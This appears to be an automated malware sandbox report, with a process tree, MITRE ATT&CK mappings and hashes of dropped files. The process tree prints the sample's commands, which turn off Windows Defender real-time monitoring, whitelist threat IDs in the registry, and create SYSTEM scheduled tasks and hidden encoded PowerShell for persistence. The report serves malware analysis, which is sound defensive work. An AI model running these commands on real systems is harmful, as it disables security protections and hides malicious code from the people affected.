        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\eyIsIjm.exe\" it /yfQdidhQsU 385118 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:1012
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:1484
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:2924
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:2768

C:\Windows\system32\taskeng.exe
taskeng.exe {5F280BCA-8B5D-4F48-BC00-DF7C44DAC7C3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1632
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\zOnZFMw.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\zOnZFMw.exe it /xaIdidnyBR 385118 /S
  2⤵
  PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2832
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:2796
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1500
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:2228
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:2648
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2836
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:1084
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:1608
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2240
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:1652
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:868
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1096
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:2856
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:1820
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:2952
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2440
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:1972
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gUvbNnOls" /SC once /ST 07:03:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1492
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gUvbNnOls"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gUvbNnOls"
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1400
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      PID:3036
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1444
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      PID:1296
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gKkLXqZXO" /SC once /ST 06:06:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gKkLXqZXO"
    3⤵
    PID:2524
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\zOnZFMw.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\zOnZFMw.exe it /xaIdidnyBR 385118 /S
  2⤵
  PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:2620
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2324
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:1224
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:780
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2052
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:1960
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:1824
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:2068
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:828
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2876
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:3016
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:1484
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:2332
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2220
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:1704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "glqGBBbaE" /SC once /ST 08:00:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "glqGBBbaE"
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "glqGBBbaE"
    3⤵
    PID:476
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1652
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:568
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      PID:2096

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510170716.log C:\Windows\Logs\CBS\CbsPersist_20240510170716.cab
1⤵
PID:2020

C:\Windows\system32\taskeng.exe
taskeng.exe {C9A37716-E2AF-4E9F-BDC5-989C92FD7293} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
1⤵
PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
f1b6d3aaafb6bdb4c3141670f05b2e48

SHA1
e2431db548089b3b2950bb67946e67aaa4dc67a0

SHA256
0425a700fdacbf4c197c1c44c14dfadc4cfc941e36d9e83853c4c8f68aa320af

SHA512
4a3530e29628c9fada82e1cab6cb4df8f847170ce212a0de73b5baec4b54720fd2c80b3bb79e8de1d59770b2866f9b6c4d2cf23c65cbecb90c1ea5e544b07435

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
2ce9dda8cf7312d8573a782647352a2f

SHA1
19bc6f092778b2141c4ffd5cc0f301090c1d33af

SHA256
609988d64b196612dd3cb428ffe1e5b89df14a91efd16db1a9c0133cc5de5eab

SHA512
4de1e2896261e534de59833c83a862b729dfdd55223e503bff5c0e08bfc9dbacfa1bfdb6e2d123360dac1a5b3ec864991d4e191767494b4c64906c8bd2089500

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
d2004c7263a8f46e918425dd77caa3b2

SHA1
8e3eefe2f55773ec0695a58b3e041e14ac7e8769

SHA256
baef6f623c804740c58863334032f034a3e0e94b7429e8a214f09c54da260991

SHA512
0aadf1fbb61b0746f2823145e99416a7abd448e41e5fe1948d5d9bf328ae3b4503d4af49616d13b1d14b194d63402ad6cb553dcb4e264ecc0366c0b13eaec20f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9EFF.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA118.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9F23.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA12C.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
46c5ef0842c77ef0260a5fc533f6db40

SHA1
f61c89db9f0be13ce7e9ea61fb8c90ba42c17fcb

SHA256
58055c758469d87f74590cd872cb72fe1eb24b6a14b7618295cc50a51eb7430a

SHA512
97a3844f1ada059ae0a8eaa2b4b5ac6c824a3f80dab5bdfc263e6f3e9232b6e665299bada37ec7d6fa8fa9f19d6d6d2b36acf88078a4119029da902b31ac9f65

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
2fa700cf12c04abbc5747a5a338e046f

SHA1
aeec704b63a73e8ec986eef51bd9dc08d9a8b00c

SHA256
c0ed6206802155fd6b8d624f694d21f49d5c71abf4f269395a0ec4657d82777a

SHA512
093a25393596acfe2216e298a1c0b33105065146b68520041e21ff13965af40c944898310975272e3a5bd0c7f309d4a8ea6391c979d86a2824f690c909d3b6c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
4.1MB

MD5
247937c88190a3ac477a6bd45c892409

SHA1
d6cebdb2026a248b2fedb9026f9e1427f1936478

SHA256
fd4f6b9dbcc29a4c31700bdb12ce32eac8875730a8e8dd633d725f9bddbac2f5

SHA512
893ea7e06f85b5ce2d5b8fa3456cc17abf72675e33482e25e47af02f5c526e1e6fec36dacc3c68b79063348de8aed847803648dd06923458086651c1386261ea

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMOOKQXHJOIKOZJXLP4T.temp

Filesize
7KB

MD5
a3b7fb6ca8c74222454ebc9a942d998c

SHA1
b5b358e46fc88c5d8e12786854c5ec38c0b84a64

SHA256
24c7001d6667ddcb3ab57fb103fe764eb1137b49bcd6c9a7dd762e3a8ff90772

SHA512
95dcd28e8546460224f1b6678aef5c5c478d5adabda7d798a8401fbc2e589f95826906f5ce9f4a5ca14b4f62549a35162cc319d8e8dad3062d3d6cf02e3f660b

Download Submit
C:\Users\Admin\Pictures\PcGMzXA67ABarM1hhm9ElHGd.exe

Filesize
6.2MB

MD5
5cc472dcd66120aed74de36341bfd75a

SHA1
1dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab

SHA256
958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773

SHA512
b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81

Download Submit
C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job

Filesize
500B

MD5
f7ebbe11533f1393f114cfc69edce24f

SHA1
162916914df30a7d5067d6450b30214b2d9188c1

SHA256
e51eac60da9b5bdf2b63b8af0dff173088e23be87428a3c3bfac6846badada07

SHA512
1bf620c80fe9d278b1a72d17289236d55b44d1fce704f6177c83f306c3e65380ee6a9f96cb9e2530ba2fba2c6cb03daee084c715b5445aec491a1f1ef57528f9

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\Temp\7zSCA22.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
\Users\Admin\AppData\Local\Temp\u21c.0.exe

Filesize
231KB

MD5
7ef8dd4292b7d2ece55b9db53d22ed30

SHA1
6d9316eccdc762e694ebb2950057ddb672a80953

SHA256
f9ad11b6e4e476c6322766fad52633e3d7419ba96b74899188c26b5b669ff18b

SHA512
5f154d79b1df078c95529a48c478771fae9330d47f8abc73a7e68978718fef3793904f3830621d53dc68b86dae53a540bc809da24495696ae5304d91350fa80c

Download Submit
\Users\Admin\AppData\Local\Temp\u21c.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
\Users\Admin\Pictures\1SWPaBQ0RIuiyfcJZWWyLMJ6.exe

Filesize
373KB

MD5
3d297df96be4150b8f54dcbd95272e4e

SHA1
74332592d1e1103390d70d0cd1fca8b31f44fc25

SHA256
116af8afc9db03bd9e2ce5c110ba610cca71f14a7b800ce60b5a23b900d94647

SHA512
5803ef647677be0e8d757bf6e3a6b27551171de4e167f9ee6bf4624e4c2670a66aaf4e0265de2713ac3d2c0e68decd9761d04a5701f00894e2007ef56699064e

Download Submit
\Users\Admin\Pictures\P8qB66NJciwkee84pVHsWxNh.exe

Filesize
4.1MB

MD5
5d46bc4982855a462c08fc9cdf2cb894

SHA1
1625c4ace4c1779badab89edd42f37c8bfcc86d6

SHA256
7f6df5c1182104000a9a6c7a9f03e5b9cf51e53d1b768ab557c9a94b52fa4c8e

SHA512
09c4fc088f64f0f8acfd19f71d2a35d6f879f2d88376b07b451554c514984b0836d959280077859229de248062664763f3d5fb8aea625ec9b33cc3b8959241c9

Download Submit
\Users\Admin\Pictures\n5fQ6muCrQpYmpmFgNBmiAus.exe

Filesize
4.1MB

MD5
85f1fcc9de87f59f37c549d956de2630

SHA1
4d96bc31f9caaf1134b460ac655742100841af82

SHA256
1640f03f39d8601b33257bde1ec3820fc4858721d1a2cd9aefdb98ea0f573ff8

SHA512
a2b96fb07ba83c6a1c486c00a09f5ccca392297cbe9a6b0889f30bb7cd6289a3514997764b0071ace4874840e9b795a80cb7487ba75ac9628cf31160eddf0ffd

Download Submit
memory/556-555-0x0000000004300000-0x00000000046F8000-memory.dmp

Filesize
4.0MB

Download
memory/556-584-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/556-576-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/912-624-0x000000001F7C0000-0x000000001FAC0000-memory.dmp

Filesize
3.0MB

Download
memory/912-562-0x000000001EF40000-0x000000001F04A000-memory.dmp

Filesize
1.0MB

Download
memory/912-586-0x00000000058E0000-0x0000000005992000-memory.dmp

Filesize
712KB

Download
memory/912-571-0x0000000000690000-0x00000000006A4000-memory.dmp

Filesize
80KB

Download
memory/912-563-0x0000000000670000-0x0000000000680000-memory.dmp

Filesize
64KB

Download
memory/912-564-0x00000000006A0000-0x00000000006AC000-memory.dmp

Filesize
48KB

Download
memory/912-678-0x000000001E3A0000-0x000000001E3AC000-memory.dmp

Filesize
48KB

Download
memory/912-620-0x0000000000A80000-0x0000000000A8A000-memory.dmp

Filesize
40KB

Download
memory/912-655-0x000000001E390000-0x000000001E39A000-memory.dmp

Filesize
40KB

Download
memory/912-582-0x0000000000C30000-0x0000000000C5A000-memory.dmp

Filesize
168KB

Download
memory/912-573-0x0000000000A60000-0x0000000000A84000-memory.dmp

Filesize
144KB

Download
memory/912-575-0x0000000000A50000-0x0000000000A5A000-memory.dmp

Filesize
40KB

Download
memory/912-656-0x000000001F520000-0x000000001F582000-memory.dmp

Filesize
392KB

Download
